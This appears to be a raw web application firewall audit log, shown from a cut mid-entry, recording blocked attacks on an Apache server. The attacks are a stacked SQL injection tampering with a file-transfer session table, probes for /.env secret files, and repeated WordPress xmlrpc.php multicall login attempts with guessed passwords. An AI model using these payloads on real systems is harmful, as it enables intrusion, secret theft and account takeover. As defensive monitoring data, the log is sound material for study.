IpAddress='206.82.6.62' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET Timeout='60' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET ResilNode='10' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET AcctReady='1' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz'; -- asdf X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62 Cookie: siLockLongTermInstID=0; SenayanMember=hoq0cmn7l5ork6n0pe0ltt5ej0 X-Varnish: 173658393 --68aad30c-C-- --68aad30c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68aad30c-E-- --68aad30c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749092432684828 3215 (- - -) Stopwatch2: 1749092432684828 3215; combined=1615, p1=475, p2=1110, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68aad30c-Z-- --45c24f0b-A-- [05/Jun/2025:10:07:24 +0700] aEEJ7Oth7G2xELALzPYf_wAAANU 103.236.140.4 32936 103.236.140.4 8181 --45c24f0b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.233 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.233 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --45c24f0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45c24f0b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749092844454041 794 (- - -) Stopwatch2: 1749092844454041 794; combined=366, p1=331, p2=0, p3=0, p4=0, p5=34, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45c24f0b-Z-- --5c0b7a6e-A-- [05/Jun/2025:10:07:51 +0700] aEEKByrHpfaS2Cuwh8XTigAAAEA 103.236.140.4 32960 103.236.140.4 8181 --5c0b7a6e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.233 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.233 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --5c0b7a6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c0b7a6e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749092871574179 940 (- - -) Stopwatch2: 1749092871574179 940; combined=393, p1=352, p2=0, p3=0, p4=0, p5=41, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c0b7a6e-Z-- --1c1a7f30-A-- [05/Jun/2025:10:55:42 +0700] aEEVPn-K7ToMdu-YSIIjWAAAABg 103.236.140.4 33728 103.236.140.4 8181 --1c1a7f30-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Accept-Charset: utf-8 --1c1a7f30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c1a7f30-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749095742566938 823 (- - -) Stopwatch2: 1749095742566938 823; combined=345, p1=306, p2=0, p3=0, p4=0, p5=39, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c1a7f30-Z-- --4746ac4a-A-- [05/Jun/2025:11:49:19 +0700] aEEhzyrHpfaS2Cuwh8XTwAAAAFU 103.236.140.4 34598 103.236.140.4 8181 --4746ac4a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 62.146.234.58 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 62.146.234.58 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --4746ac4a-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh123* --4746ac4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4746ac4a-E-- --4746ac4a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 62.146.234.58 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749098959797691 5193 (- - -) Stopwatch2: 1749098959797691 5193; combined=3851, p1=527, p2=3151, p3=0, p4=0, p5=103, sr=164, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4746ac4a-Z-- --1b085c2c-A-- [05/Jun/2025:11:50:56 +0700] aEEiMH-K7ToMdu-YSIIj-QAAAAg 103.236.140.4 34640 103.236.140.4 8181 --1b085c2c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --1b085c2c-C-- system.multicallmethodNamewp.getUsersBlogsparamswordcampz43218765z --1b085c2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b085c2c-E-- --1b085c2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099056125279 5471 (- - -) Stopwatch2: 1749099056125279 5471; combined=3917, p1=460, p2=3285, p3=0, p4=0, p5=102, sr=88, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b085c2c-Z-- --0880cc24-A-- [05/Jun/2025:11:52:07 +0700] aEEid3-K7ToMdu-YSIIkAAAAABE 103.236.140.4 34674 103.236.140.4 8181 --0880cc24-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 43.224.126.115 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 43.224.126.115 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0880cc24-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin123* --0880cc24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0880cc24-E-- --0880cc24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 43.224.126.115 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099127614158 6117 (- - -) Stopwatch2: 1749099127614158 6117; combined=4257, p1=507, p2=3562, p3=0, p4=0, p5=112, sr=91, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0880cc24-Z-- --c0913a69-A-- [05/Jun/2025:11:52:12 +0700] aEEifH-K7ToMdu-YSIIkAQAAAA8 103.236.140.4 34676 103.236.140.4 8181 --c0913a69-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 62.146.234.58 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 62.146.234.58 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c0913a69-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin123* --c0913a69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0913a69-E-- --c0913a69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 62.146.234.58 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099132106555 5116 (- - -) Stopwatch2: 1749099132106555 5116; combined=3793, p1=451, p2=3173, p3=0, p4=0, p5=99, sr=97, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0913a69-Z-- --5a520152-A-- [05/Jun/2025:11:54:11 +0700] aEEi8-th7G2xELALzPYgfwAAAM0 103.236.140.4 34758 103.236.140.4 8181 --5a520152-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 62.146.234.58 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 62.146.234.58 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5a520152-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin786 --5a520152-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a520152-E-- --5a520152-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 62.146.234.58 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099251329370 5391 (- - -) Stopwatch2: 1749099251329370 5391; combined=3847, p1=475, p2=3199, p3=0, p4=0, p5=102, sr=93, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a520152-Z-- --dfc8710d-A-- [05/Jun/2025:11:54:45 +0700] aEEjFX-K7ToMdu-YSIIkLAAAAAs 103.236.140.4 34780 103.236.140.4 8181 --dfc8710d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 43.224.126.115 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 43.224.126.115 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --dfc8710d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh786 --dfc8710d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfc8710d-E-- --dfc8710d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 43.224.126.115 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099285514928 4412 (- - -) Stopwatch2: 1749099285514928 4412; combined=3500, p1=382, p2=2952, p3=0, p4=0, p5=96, sr=82, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfc8710d-Z-- --c4042b47-A-- [05/Jun/2025:11:56:11 +0700] aEEja3-K7ToMdu-YSIIkMgAAABQ 103.236.140.4 34852 103.236.140.4 8181 --c4042b47-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.62.24.23 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.62.24.23 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c4042b47-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh@@ --c4042b47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4042b47-E-- --c4042b47-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.62.24.23 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099371079650 5043 (- - -) Stopwatch2: 1749099371079650 5043; combined=3693, p1=398, p2=3116, p3=0, p4=0, p5=106, sr=80, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4042b47-Z-- --d78b1b51-A-- [05/Jun/2025:11:56:19 +0700] aEEjc1wdJdhOudw5hdzOwQAAAJQ 103.236.140.4 34864 103.236.140.4 8181 --d78b1b51-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 77.222.57.100 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 77.222.57.100 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d78b1b51-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin123admin --d78b1b51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d78b1b51-E-- --d78b1b51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 77.222.57.100 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099379554961 4604 (- - -) Stopwatch2: 1749099379554961 4604; combined=3650, p1=399, p2=3064, p3=0, p4=0, p5=107, sr=80, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d78b1b51-Z-- --b93c3d32-A-- [05/Jun/2025:11:56:21 +0700] aEEjdVwdJdhOudw5hdzOwgAAAJU 103.236.140.4 34870 103.236.140.4 8181 --b93c3d32-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 62.146.234.58 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 62.146.234.58 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b93c3d32-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh@@ --b93c3d32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b93c3d32-E-- --b93c3d32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 62.146.234.58 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099381733225 4912 (- - -) Stopwatch2: 1749099381733225 4912; combined=3660, p1=360, p2=3113, p3=0, p4=0, p5=110, sr=74, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b93c3d32-Z-- --04f4b771-A-- [05/Jun/2025:11:57:37 +0700] aEEjwVwdJdhOudw5hdzOwwAAAJM 103.236.140.4 34896 103.236.140.4 8181 --04f4b771-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 43.224.126.115 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 43.224.126.115 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --04f4b771-C-- system.multicallmethodNamewp.getUsersBlogsparamssoleh[Login]123soleh --04f4b771-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04f4b771-E-- --04f4b771-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 43.224.126.115 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099457930493 5348 (- - -) Stopwatch2: 1749099457930493 5348; combined=3904, p1=454, p2=3275, p3=0, p4=0, p5=102, sr=88, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04f4b771-Z-- --7c73cd0f-A-- [05/Jun/2025:11:58:01 +0700] aEEj2X-K7ToMdu-YSIIkQgAAAAw 103.236.140.4 34914 103.236.140.4 8181 --7c73cd0f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.62.24.23 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.62.24.23 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7c73cd0f-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh456 --7c73cd0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c73cd0f-E-- --7c73cd0f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.62.24.23 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099481428702 6477 (- - -) Stopwatch2: 1749099481428702 6477; combined=4637, p1=581, p2=3879, p3=0, p4=0, p5=105, sr=94, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c73cd0f-Z-- --591ae42a-A-- [05/Jun/2025:11:59:57 +0700] aEEkTSrHpfaS2Cuwh8XT4wAAAE0 103.236.140.4 34974 103.236.140.4 8181 --591ae42a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 77.222.57.100 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 77.222.57.100 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --591ae42a-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh2013 --591ae42a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --591ae42a-E-- --591ae42a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 77.222.57.100 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099597705079 5954 (- - -) Stopwatch2: 1749099597705079 5954; combined=4266, p1=530, p2=3562, p3=0, p4=0, p5=103, sr=91, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --591ae42a-Z-- --ccb35411-A-- [05/Jun/2025:12:00:36 +0700] aEEkdCrHpfaS2Cuwh8XT6gAAAFc 103.236.140.4 34996 103.236.140.4 8181 --ccb35411-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 62.146.234.58 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 62.146.234.58 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --ccb35411-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin22 --ccb35411-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 